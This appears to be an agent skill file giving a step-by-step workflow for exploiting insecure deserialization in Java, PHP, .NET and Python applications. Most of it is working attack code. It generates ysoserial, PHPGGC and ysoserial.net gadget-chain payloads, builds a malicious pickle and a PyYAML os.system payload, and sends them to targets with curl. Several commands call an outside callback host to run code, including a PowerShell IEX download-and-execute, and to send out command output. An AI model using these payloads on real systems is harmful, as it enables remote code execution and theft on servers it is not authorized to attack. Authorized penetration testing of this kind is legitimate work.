exploiting-insecure-deserialization

What this skill does

# Exploiting Insecure Deserialization

## When to Use

- During authorized penetration tests when applications process serialized data (cookies, API parameters, message queues)
- When identifying Java serialization markers (`ac ed 00 05` / `rO0AB`) in HTTP traffic
- For testing PHP applications that use `unserialize()` on user-controlled input
- When evaluating .NET applications using `BinaryFormatter`, `ObjectStateFormatter`, or `ViewState`
- During security assessments of applications using pickle (Python), Marshal (Ruby), or YAML deserialization

## Prerequisites

- **Authorization**: Written penetration testing agreement with RCE testing scope
- **ysoserial**: Java deserialization exploit tool (`git clone https://github.com/frohoff/ysoserial.git`)
- **ysoserial.net**: .NET deserialization exploit tool (`git clone https://github.com/pwntester/ysoserial.net.git`)
- **PHPGGC**: PHP deserialization gadget chain generator (`git clone https://github.com/ambionics/phpggc.git`)
- **Burp Suite Professional**: With Java Deserialization Scanner extension
- **Java Runtime**: For running ysoserial
- **Collaborator/interactsh**: For out-of-band confirmation of code execution

## Workflow

### Step 1: Identify Serialized Data in Application Traffic

Detect serialized objects in HTTP parameters, cookies, and headers.

```bash
# Java serialization markers
# Binary: starts with 0xACED0005
# Base64: starts with rO0AB
# Gzip+Base64: starts with H4sIAAAAAAAA

# Search Burp proxy history for serialization signatures
# In Burp: Proxy > HTTP History > Search > "rO0AB"

# Check cookies and parameters for Base64-encoded serialized data
echo "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcA..." | base64 -d | xxd | head

# PHP serialization format
# Looks like: O:4:"User":2:{s:4:"name";s:5:"admin";s:4:"role";s:4:"user";}
# a:2:{i:0;s:5:"hello";i:1;s:5:"world";}

# .NET ViewState
# __VIEWSTATE parameter in ASP.NET forms
# Starts with /wEP... (base64)

# Python pickle
# Base64 encoded pickle objects in cookies or API parameters
# Binary starts with 0x80 (protocol version)

# Common locations to check:
# - Session cookies
# - Hidden form fields (__VIEWSTATE, __EVENTVALIDATION)
# - API request/response bodies
# - WebSocket messages
# - Message queue payloads (JMS, RabbitMQ, Redis)
# - Cache entries (Memcached, Redis)
```

### Step 2: Test Java Deserialization with ysoserial

Generate deserialization payloads for Java applications.

```bash
# List available gadget chains
java -jar ysoserial.jar 2>&1 | grep -E "^\s+\w"

# Generate DNS callback payload for detection (safest test)
java -jar ysoserial.jar URLDNS "http://java-deser.abc123.oast.fun" | base64 -w0

# Test with Burp Collaborator
# Replace serialized cookie/parameter with generated payload
# Check Collaborator for DNS/HTTP callbacks

# Generate RCE payloads with common gadget chains
# CommonsCollections (very common in Java apps)
java -jar ysoserial.jar CommonsCollections1 "curl http://abc123.oast.fun/rce" | base64 -w0
java -jar ysoserial.jar CommonsCollections5 "whoami" | base64 -w0
java -jar ysoserial.jar CommonsCollections6 "id" | base64 -w0

# Spring Framework gadget
java -jar ysoserial.jar Spring1 "curl http://abc123.oast.fun/spring" | base64 -w0

# Hibernate gadget
java -jar ysoserial.jar Hibernate1 "curl http://abc123.oast.fun/hibernate" | base64 -w0

# Send payload via curl
PAYLOAD=$(java -jar ysoserial.jar CommonsCollections5 "curl http://abc123.oast.fun/confirm" | base64 -w0)
curl -s -X POST \
  -b "session=$PAYLOAD" \
  "https://target.example.com/dashboard"
```

### Step 3: Test PHP Deserialization with PHPGGC

Generate PHP gadget chains for common frameworks.

```bash
# List available PHP gadget chains
./phpggc -l

# Generate payloads for common PHP frameworks
# Laravel RCE
./phpggc Laravel/RCE1 system "id" -b
./phpggc Laravel/RCE5 system "whoami" -b

# Symfony RCE
./phpggc Symfony/RCE4 exec "curl http://abc123.oast.fun/php-rce" -b

# WordPress (via Guzzle)
./phpggc Guzzle/RCE1 system "id" -b

# Monolog RCE
./phpggc Monolog/RCE1 system "id" -b

# Test by injecting into cookie or parameter
PAYLOAD=$(./phpggc Laravel/RCE1 system "curl http://abc123.oast.fun/laravel" -b)
curl -s -b "serialized_data=$PAYLOAD" \
  "https://target.example.com/dashboard"

# PHP object injection via manipulated serialized string
# Original: O:4:"User":2:{s:4:"name";s:5:"admin";s:4:"role";s:4:"user";}
# Modified: O:4:"User":2:{s:4:"name";s:5:"admin";s:4:"role";s:5:"admin";}

# Test for type juggling with PHP unserialize
# Change string to integer: s:4:"role" -> i:1
```

### Step 4: Test .NET Deserialization

Assess ViewState and other .NET serialization vectors.

```bash
# Analyze .NET ViewState
# Check if ViewState MAC is enabled
# Unprotected ViewState starts with /wE and can be decoded

# Using ysoserial.net for .NET payloads
# (Run on Windows or via Mono on Linux)
./ysoserial.exe -g TypeConfuseDelegate -f ObjectStateFormatter \
  -c "curl http://abc123.oast.fun/dotnet-rce" -o base64

./ysoserial.exe -g TextFormattingRunProperties -f BinaryFormatter \
  -c "whoami" -o base64

# Test ViewState deserialization
# If __VIEWSTATEMAC is disabled or machine key is known:
./ysoserial.exe -g ActivitySurrogateSelector -f ObjectStateFormatter \
  -c "powershell -c IEX(curl http://abc123.oast.fun/ps)" -o base64

# Insert payload into __VIEWSTATE parameter and submit form

# Check for .NET remoting endpoints
curl -s "https://target.example.com/remoting/service.rem"

# BinaryFormatter in API endpoints
# Look for Content-Type: application/octet-stream
# or application/x-msbin headers
```

### Step 5: Test Python Pickle Deserialization

Exploit pickle-based deserialization in Python applications.

```python
# Generate malicious pickle payload
import pickle
import base64
import os

class Exploit:
    def __reduce__(self):
        return (os.system, ('curl http://abc123.oast.fun/pickle-rce',))

payload = base64.b64encode(pickle.dumps(Exploit())).decode()
print(f"Pickle payload: {payload}")

# Alternative: Use pickletools for analysis
import pickletools
pickletools.dis(pickle.dumps(Exploit()))
```

```bash
# Send pickle payload
PAYLOAD=$(python3 -c "
import pickle, base64, os
class E:
    def __reduce__(self):
        return (os.system, ('curl http://abc123.oast.fun/pickle',))
print(base64.b64encode(pickle.dumps(E())).decode())
")

curl -s -X POST \
  -H "Content-Type: application/octet-stream" \
  -d "$PAYLOAD" \
  "https://target.example.com/api/import"

# Check for YAML deserialization (PyYAML)
# Payload: !!python/object/apply:os.system ['curl http://abc123.oast.fun/yaml']
curl -s -X POST \
  -H "Content-Type: application/x-yaml" \
  -d "!!python/object/apply:os.system ['curl http://abc123.oast.fun/yaml']" \
  "https://target.example.com/api/config"
```

### Step 6: Confirm Exploitation and Document Impact

Validate successful deserialization attacks and document the impact chain.

```bash
# Confirm RCE with out-of-band callback
# Check interactsh/Collaborator for:
# 1. DNS resolution of your callback domain
# 2. HTTP request with command output
# 3. Timing-based confirmation (sleep commands)

# If blind, use timing-based confirmation
# Java: Thread.sleep(10000)
java -jar ysoserial.jar CommonsCollections5 "sleep 10" | base64 -w0
# Measure if response takes ~10 seconds longer

# Exfiltrate system info (authorized testing only)
java -jar ysoserial.jar CommonsCollections5 \
  "curl http://abc123.oast.fun/\$(whoami)" | base64 -w0

# Document the gadget chain and affected library versions
# Check target classpath for vulnerable libraries:
# - commons-collections 3.x / 4.0
# - spring-core
# - hibernate-core
# - groovy
```

## Key Concepts

| Concept | Description |
|---------|-------------|
| **Serialization** | Converting an object into a byte stream for storage or transmission |
| **Deserialization** | Reconstructing an object from a byte stream, potentially executing code |
| **Gadget Chain** | A sequence of existing class methods chained together to achieve ar